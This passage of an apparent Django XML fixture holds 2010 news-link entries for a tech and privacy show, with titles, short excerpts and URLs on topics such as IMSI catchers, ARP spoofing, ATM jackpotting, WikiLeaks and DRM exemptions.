&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/IMSI-Catcher-fuer-1500-Euro-im-Eigenbau-1048919.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/01/heiseonline-imsi-catcherfur1500euroimeigen.png</field><field type="SlugField" name="slug">heiseonline-imsi-catcherfur1500euroimeigen</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-01 18:31:12</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">gsm imsi</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="353" model="submitter.newsentry"><field type="CharField" name="title">heise online - US-Behörden verhören Wikileaks-Aktivisten</field><field type="TextField" name="excerpt">Der Friedensnobelpreisträger läßt Jacob Applebaum fest nehmen. Verkehrte Welt.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Der Friedensnobelpreisträger läßt Jacob Applebaum fest nehmen. Verkehrte Welt.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/US-Behoerden-verhoeren-Wikileaks-Aktivisten-1048925.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/01/heiseonline-us-behordenverhorenwikileaks-akti.png</field><field type="SlugField" name="slug">heiseonline-us-behordenverhorenwikileaks-akti</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-01 18:28:25</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">wikileaks</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="352" model="submitter.newsentry"><field type="CharField" name="title">heise online - WPA2-Lücke: ARP-Spoofing im WLAN</field><field type="TextField" name="excerpt">ARP spoofing jetzt neu fürs WLAN (WPA2 Enterprise)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;ARP spoofing jetzt neu fürs WLAN (WPA2 Enterprise)
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/WPA2-Luecke-ARP-Spoofing-im-WLAN-1048568.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/30/heiseonline-wpa2-luckearp-spoofingimwlan.png</field><field type="SlugField" name="slug">heiseonline-wpa2-luckearp-spoofingimwlan</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-30 16:28:39</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">hack wlan wpa</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="351" model="submitter.newsentry"><field type="CharField" name="title">Researcher demonstrates ATM &amp;quot;jackpotting&amp;quot; at Black Hat Conference</field><field type="TextField" name="excerpt">In one of the attacks, Jack reprogrammed the ATM remotely over a network, without touching the machine; the second attack required he open the front panel and plug in a USB stick loaded with malware.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;In one of the attacks, Jack reprogrammed the ATM remotely over a network, without touching the machine; the second attack required he open the front panel and plug in a USB stick loaded with malware.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/security/news/2010/07/researcher-demonstrates-atm-jackpotting-at-black-hat-conference.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/07/30/researcherdemonstratesatmquotjackpottingquot.png</field><field type="SlugField" name="slug">researcherdemonstratesatmquotjackpottingquot</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-30 00:34:03</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">atm</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="350" model="submitter.newsentry"><field type="CharField" name="title">100 million Facebook users' details published online - Technology &amp; science - Security - msnbc.com</field><field type="TextField" name="excerpt">The personal details of 100 million Facebook users have been collected and published online in a downloadable file, meaning they will now be unable to make their publicly available information private.
However, Facebook downplayed the issue, saying that no private data had been compromised.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The personal details of 100 million Facebook users have been collected and published online in a downloadable file, meaning they will now be unable to make their publicly available information private.
However, Facebook downplayed the issue, saying that no private data had been compromised.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.msnbc.msn.com/id/38463013/ns/technology_and_science/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/30/100millionfacebookusersdetailspublishedonli.png</field><field type="SlugField" name="slug">100millionfacebookusersdetailspublishedonli</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-30 00:32:12</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">facebook</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="10"></object></field></object><object pk="349" model="submitter.newsentry"><field type="CharField" name="title">Google nabs patent to monitor your cursor movements - Search giant ogles cursor monitoring for refined search results | TechEye</field><field type="TextField" name="excerpt">Google has been awarded a patent for displaying search results based on how you move your mouse cursor on the screen.
While it sounds initially bizarre, Google's plans are to monitor the movements of the cursor, such as when a user hovers over a certain ad or link to read a tooltip, and then provide relevant search results, and ads, based on that behaviour. It means that it does not require users to actually click a link to know that they were interested in it, opening a world of opportunity for even more focused ads, which are Google's main source of income.
Read more: http://www.techeye.net/internet/google-nabs-patent-to-monitor-your-cursor-movements#ixzz0v0kbkx3V</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Google has been awarded a patent for displaying search results based on how you move your mouse cursor on the screen.
&lt;/p&gt;
&lt;p&gt;While it sounds initially bizarre, Google's plans are to monitor the movements of the cursor, such as when a user hovers over a certain ad or link to read a tooltip, and then provide relevant search results, and ads, based on that behaviour. It means that it does not require users to actually click a link to know that they were interested in it, opening a world of opportunity for even more focused ads, which are Google's main source of income.
&lt;/p&gt;
&lt;p&gt;Read more: http://www.techeye.net/internet/google-nabs-patent-to-monitor-your-cursor-movements#ixzz0v0kbkx3V
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.techeye.net/internet/google-nabs-patent-to-monitor-your-cursor-movements</field><field type="FileField" name="page_screenshot">page_shots/2010/07/28/googlenabspatenttomonitoryourcursormovement.png</field><field type="SlugField" name="slug">googlenabspatenttomonitoryourcursormovement</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-28 22:31:42</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">google mouse patent</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="348" model="submitter.newsentry"><field type="CharField" name="title">Google Alarm</field><field type="TextField" name="excerpt">Google Alarm shows notifications, plays sound effects and keeps running stats about the % of websites youve visit with Google bugs present.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Google Alarm shows notifications, plays sound effects and keeps running stats about the % of websites youve visit with Google bugs present.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://fffff.at/google-alarm/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/28/googlealarm.png</field><field type="SlugField" name="slug">googlealarm</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-28 14:26:20</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">google online privacy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="2"></object></field></object><object pk="347" model="submitter.newsentry"><field type="CharField" name="title">"Indexing and retrieval of blogs" patented by Google</field><field type="TextField" name="excerpt">According to this new "Indexing and retrieval of blogs" entry in the U.S. Patents database, Google has just today received protection for searching blogs.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;According to this new "Indexing and retrieval of blogs" entry in the U.S. Patents database, Google has just today received protection for searching blogs.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO1&amp;Sect2=HITOFF&amp;d=PALL&amp;p=1&amp;u=%2Fnetahtml%2FPTO%2Fsrchnum.htm&amp;r=1&amp;f=G&amp;l=50&amp;s1=7,765,209.PN.&amp;OS=PN/7,765,209&amp;RS=PN/7,765,209</field><field type="FileField" name="page_screenshot">page_shots/2010/07/28/indexingandretrievalofblogspatentedbygoog.png</field><field type="SlugField" name="slug">indexingandretrievalofblogspatentedbygoog</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-28 14:25:00</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">google patent search software</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="346" model="submitter.newsentry"><field type="CharField" name="title">heise online - Massenerkrankung in Foxconn-Werk</field><field type="TextField" name="excerpt">nachdem rund 250 Mitarbeiter am vergangenen Freitag während der Arbeit plötzlich über Schwindelgefühle und Übelkeit klagten und ärztlich behandelt werden mussten. ... Das Foxconn-Management äußert aber die Vermutung, "routinemäßig auf dem Werksgelände versprühte Pestizide" könnten der Grund dafür sein.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;nachdem rund 250 Mitarbeiter am vergangenen Freitag während der Arbeit plötzlich über Schwindelgefühle und Übelkeit klagten und ärztlich behandelt werden mussten. ... Das Foxconn-Management äußert aber die Vermutung, "routinemäßig auf dem Werksgelände versprühte Pestizide" könnten der Grund dafür sein.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Massenerkrankung-in-Foxconn-Werk-1046583.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/28/heiseonline-massenerkrankunginfoxconn-werk.png</field><field type="SlugField" name="slug">heiseonline-massenerkrankunginfoxconn-werk</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-28 14:15:52</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">apple foxconn labour</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="345" model="submitter.newsentry"><field type="CharField" name="title">vowe dot net :: Lug und Trug von 1&amp;1</field><field type="TextField" name="excerpt">1 und 1 schickt Werbung mit Absender aus den Kontakten.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;1 und 1 schickt Werbung mit Absender aus den Kontakten.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://vowe.net/archives/011607.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/28/vowedotnetlugundtrugvon11.png</field><field type="SlugField" name="slug">vowedotnetlugundtrugvon11</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-28 09:46:57</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">1und1 fraud</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="344" model="submitter.newsentry"><field type="CharField" name="title">Pork-Filled Counter-Islamic Bomb Device</field><field type="TextField" name="excerpt">Reading the partial patent application on their minimal website, it appears to be a packet of pork product, combined with a big sign saying something like: "Warning. If you blow up a bomb right here, you'll get pork stuff all over you before you die -- which might be suboptimal from a religious point of view."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Reading the partial patent application on their minimal website, it appears to be a packet of pork product, combined with a big sign saying something like: "Warning. If you blow up a bomb right here, you'll get pork stuff all over you before you die -- which might be suboptimal from a religious point of view."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.schneier.com/blog/archives/2010/07/pork-filled_cou.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/28/pork-filledcounter-islamicbombdevice_.png</field><field type="SlugField" name="slug">pork-filledcounter-islamicbombdevice</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">15</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-28 02:01:09</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">:m</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="343" model="submitter.newsentry"><field type="CharField" name="title">Terrorismusexperte warnt vor C++</field><field type="TextField" name="excerpt">Schön blöd: Im französischen Sender France5 hat der “Terrorismusexperte” Roland Jacquard von der Organisation “Observatoire international du terrorisme” vor Al-Quaida Handbüchern im Netz gewarnt. Dabei war er so kundig von der Materie, dass er ein C++ Programmierbuch in arabischer Sprache den Zuschauern präsentierte</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Schön blöd: Im französischen Sender France5 hat der “Terrorismusexperte” Roland Jacquard von der Organisation “Observatoire international du terrorisme” vor Al-Quaida Handbüchern im Netz gewarnt. Dabei war er so kundig von der Materie, dass er ein C++ Programmierbuch in arabischer Sprache den Zuschauern präsentierte
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/terrorismusexperte-warnt-vor-c/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/27/terrorismusexpertewarntvorc.png</field><field type="SlugField" name="slug">terrorismusexpertewarntvorc</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">15</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-27 15:12:25</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">c++ panikmache terror</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="342" model="submitter.newsentry"><field type="CharField" name="title">UK ISP TalkTalk Monitoring its Customers Online Activity Without Consent &amp;minus; ISPreview UK</field><field type="TextField" name="excerpt">Broadband ISP TalkTalk UK could be about to incur the wrath of privacy campaigners after some of its customers spotted that their online website browsing activity was being monitored and recorded without consent.
TalkTalk has since confirmed that the monitoring, which was first discovered on the ISPs discussion forum during the middle of July (here), is part of a future Malware/Security/Parental Guidance tool to be provided by Chinese vendor Huawei. This is due to launch before the end of 2010. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Broadband ISP TalkTalk UK could be about to incur the wrath of privacy campaigners after some of its customers spotted that their online website browsing activity was being monitored and recorded without consent.
&lt;/p&gt;
&lt;p&gt;TalkTalk has since confirmed that the monitoring, which was first discovered on the ISPs discussion forum during the middle of July (here), is part of a future Malware/Security/Parental Guidance tool to be provided by Chinese vendor Huawei. This is due to launch before the end of 2010.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.ispreview.co.uk/story/2010/07/26/uk-isp-talktalk-monitoring-its-customers-online-activity-without-consent.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/27/ukisptalktalkmonitoringitscustomersonlineac.png</field><field type="SlugField" name="slug">ukisptalktalkmonitoringitscustomersonlineac</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-27 15:10:37</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">censorship isp spyware</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="341" model="submitter.newsentry"><field type="CharField" name="title">Georgische Wirtschaftsministerin tanzt Striptease</field><field type="TextField" name="excerpt">Facebook-Foto sorgt für einen Skandal: Georgische Wirtschaftsministerin tanzt Striptease</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Facebook-Foto sorgt für einen Skandal: Georgische Wirtschaftsministerin tanzt Striptease
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.aktuell.ru/russland/panorama/georgische_wirtschaftsministerin_tanzt_striptease_3062.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/27/georgischewirtschaftsministerintanztstriptease.png</field><field type="SlugField" name="slug">georgischewirtschaftsministerintanztstriptease</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">15</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-27 15:00:40</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">data facebook loss</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="340" model="submitter.newsentry"><field type="CharField" name="title">EFF wins enormous victory against DRM: legal to jailbreak iPhones, rip DVDs for mashup videos</field><field type="TextField" name="excerpt">The Electronic Frontier Foundation drove three deep wedges into the US prohibition on breaking DRM today. EFF had applied to the Copyright Office to grant exemptions permitting the cracking of DRM in three cases: first, to "jailbreak" a mobile device, such as an iPhone, where DRM is used to prevent phone owners from running software of their own choosing; second, to allow video remix artists to break the DRM on DVDs in order to take short excerpts for mashups posted to YouTube and other sharing sites; finally EFF got the Copyright Office to renew its ruling that made it legal to unlock cellphones so that they can be used with any carrier.
These are major blows against the tradition in US law of protecting DRM, even when DRM wasn't upholding copyright. For example, Apple argued in its Copyright Office filing that it should be illegal under copyright law to install iPhone software unless Apple had approved and supplied it (akin to the principle that you should only be allowed company-approved bread in your toaster, or Folgers-approved milk in your instant coffee). </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The Electronic Frontier Foundation drove three deep wedges into the US prohibition on breaking DRM today. EFF had applied to the Copyright Office to grant exemptions permitting the cracking of DRM in three cases: first, to "jailbreak" a mobile device, such as an iPhone, where DRM is used to prevent phone owners from running software of their own choosing; second, to allow video remix artists to break the DRM on DVDs in order to take short excerpts for mashups posted to YouTube and other sharing sites; finally EFF got the Copyright Office to renew its ruling that made it legal to unlock cellphones so that they can be used with any carrier.
&lt;/p&gt;
&lt;p&gt;These are major blows against the tradition in US law of protecting DRM, even when DRM wasn't upholding copyright. For example, Apple argued in its Copyright Office filing that it should be illegal under copyright law to install iPhone software unless Apple had approved and supplied it (akin to the principle that you should only be allowed company-approved bread in your toaster, or Folgers-approved milk in your instant coffee).
&lt;/p&gt;</field><field type="CharField" name="external_url">https://www.eff.org/press/archives/2010/07/26</field><field type="FileField" name="page_screenshot">page_shots/2010/07/27/effwinsenormousvictoryagainstdrmlegaltoja.png</field><field type="SlugField" name="slug">effwinsenormousvictoryagainstdrmlegaltoja</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-27 14:52:03</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">apple, copyfight, digital, digital media, dmca, eff, freedom, imaginary property, legal</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="339" model="submitter.newsentry"><field type="CharField" name="title">Enthüllung brisanter Kriegsdokumente: Die Afghanistan-Protokolle - SPIEGEL ONLINE - Nachrichten - Politik</field><field type="TextField" name="excerpt">For the records: Wikileaks veröffentlicht 92k z. T. geheimer Berichte des US-Militärs zum Afghanistaneinsatz 2006-2009</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;For the records: Wikileaks veröffentlicht 92k z. T. geheimer Berichte des US-Militärs zum Afghanistaneinsatz 2006-2009
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.spiegel.de/politik/ausland/0,1518,708311,00.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/27/enthullungbrisanterkriegsdokumentedieafghanis.png</field><field type="SlugField" name="slug">enthullungbrisanterkriegsdokumentedieafghanis</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-27 09:24:04</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">military wikileaks</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="338" model="submitter.newsentry"><field type="CharField" name="title">heise online - Anwälte kritisisieren De-Mail</field><field type="TextField" name="excerpt">Der deutsche Anwaltsverein hat in einer Stellungnahme (PDF-Datei) die geplanten Regelungen des De-Mail-Dienstes kritisiert. Grundsätzlich sieht er gar keinen Bedarf für den Dienst. Wer rechtssichere Mail haben wolle, könne schon heute mit der vorhandenen Infrastruktur der elektronischen Signatur arbeiten.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Der deutsche Anwaltsverein hat in einer Stellungnahme (PDF-Datei) die geplanten Regelungen des De-Mail-Dienstes kritisiert. Grundsätzlich sieht er gar keinen Bedarf für den Dienst. Wer rechtssichere Mail haben wolle, könne schon heute mit der vorhandenen Infrastruktur der elektronischen Signatur arbeiten.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Anwaelte-kritisisieren-De-Mail-1045652.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/27/heiseonline-anwaltekritisisierende-mail.png</field><field type="SlugField" name="slug">heiseonline-anwaltekritisisierende-mail</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-27 09:22:18</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">de-mail</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="337" model="submitter.newsentry"><field type="CharField" name="title">SkullSecurity &amp;raquo; Blog Archive &amp;raquo; Return of the Facebook Snatchers</field><field type="TextField" name="excerpt">Well last week @FSLabsAdvisor wrote an interesting Tweet: it turns out, by heading to https://www.facebook.com/directory, you can get a list of every searchable user on all of Facebook! Torrent provided!</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Well last week @FSLabsAdvisor wrote an interesting Tweet: it turns out, by heading to https://www.facebook.com/directory, you can get a list of every searchable user on all of Facebook! Torrent provided!
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.skullsecurity.org/blog/?p=887</field><field type="FileField" name="page_screenshot">page_shots/2010/07/27/skullsecurityraquoblogarchiveraquoretu.png</field><field type="SlugField" name="slug">skullsecurityraquoblogarchiveraquoretu</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-27 09:15:48</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">facebook</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object><object pk="10"></object></field></object><object pk="336" model="submitter.newsentry"><field type="CharField" name="title">AppleInsider | US government legalizes iPhone 'jailbreaking,' unlocking</field><field type="TextField" name="excerpt">The U.S. government on Monday announced new rules that make it officially legal for iPhone owners to "jailbreak" their device and run unauthorized third-party applications. In addition, it is now acceptable to unlock any cell phone for use on multiple carriers.
According to The Associated Press, the government approved a handful of new exemptions to a federal law that prevents the circumvention of technical measure that prevent users from accessing and modifying copyrighted works. The report noted that every three years, the Library of Congress' Copyright Office authorizes exemptions to ensure existing law does not prevent non-infringing use of copyrighted material.
In addition, another exemption was approved that would allow all cell phone users to unlock their device for use on an unapproved carrier. Currently, Apple's iPhone is available exclusively through AT&amp;T, but unlocking it can allow for voice calls and EDGE data speeds on rival carrier T-Mobile.
Other exemptions announced Monday allow people to break protections on video games to investigate or correct security flaws; allow college professors, film students and documentary filmmakers to break copy protection measures on DVDs to embed clips for educational purposes, criticism, commentary and noncommercial videos; and allow computer owners to bypass the need for external security devices (dongles) if the hardware no longer works and cannot be replaced.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The U.S. government on Monday announced new rules that make it officially legal for iPhone owners to "jailbreak" their device and run unauthorized third-party applications. In addition, it is now acceptable to unlock any cell phone for use on multiple carriers.
&lt;/p&gt;
&lt;p&gt;According to The Associated Press, the government approved a handful of new exemptions to a federal law that prevents the circumvention of technical measure that prevent users from accessing and modifying copyrighted works. The report noted that every three years, the Library of Congress' Copyright Office authorizes exemptions to ensure existing law does not prevent non-infringing use of copyrighted material.
&lt;/p&gt;
&lt;p&gt;In addition, another exemption was approved that would allow all cell phone users to unlock their device for use on an unapproved carrier. Currently, Apple's iPhone is available exclusively through AT&amp;amp;T, but unlocking it can allow for voice calls and EDGE data speeds on rival carrier T-Mobile.
&lt;/p&gt;
&lt;p&gt;Other exemptions announced Monday allow people to break protections on video games to investigate or correct security flaws; allow college professors, film students and documentary filmmakers to break copy protection measures on DVDs to embed clips for educational purposes, criticism, commentary and noncommercial videos; and allow computer owners to bypass the need for external security devices (dongles) if the hardware no longer works and cannot be replaced.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.appleinsider.com/articles/10/07/26/us_government_legalizes_iphone_jailbreaking_for_unauthorized_apps.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/26/appleinsiderusgovernmentlegalizesiphonejai.png</field><field type="SlugField" name="slug">appleinsiderusgovernmentlegalizesiphonejai</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-26 22:44:41</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">apple copyfight jailbreak</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="335" model="submitter.newsentry"><field type="CharField" name="title"> Hackers shut down EU carbon-trading website | Environment | guardian.co.uk </field><field type="TextField" name="excerpt">Hackers hijacked Europe's carbon-trading website and replaced it with spoof page detailing flaws in cap and trade scheme</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Hackers hijacked Europe's carbon-trading website and replaced it with spoof page detailing flaws in cap and trade scheme
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.guardian.co.uk/environment/2010/jul/26/eu-carbon-trading-website-hacked</field><field type="FileField" name="page_screenshot">page_shots/2010/07/26/hackersshutdowneucarbon-tradingwebsiteenv.png</field><field type="SlugField" name="slug">hackersshutdowneucarbon-tradingwebsiteenv</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-26 22:42:03</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">defacement ecology</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="334" model="submitter.newsentry"><field type="CharField" name="title">
Bremer Proteste gegen Datensammlung | WESER-KURIER</field><field type="TextField" name="excerpt">passend zum Thema</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;passend zum Thema
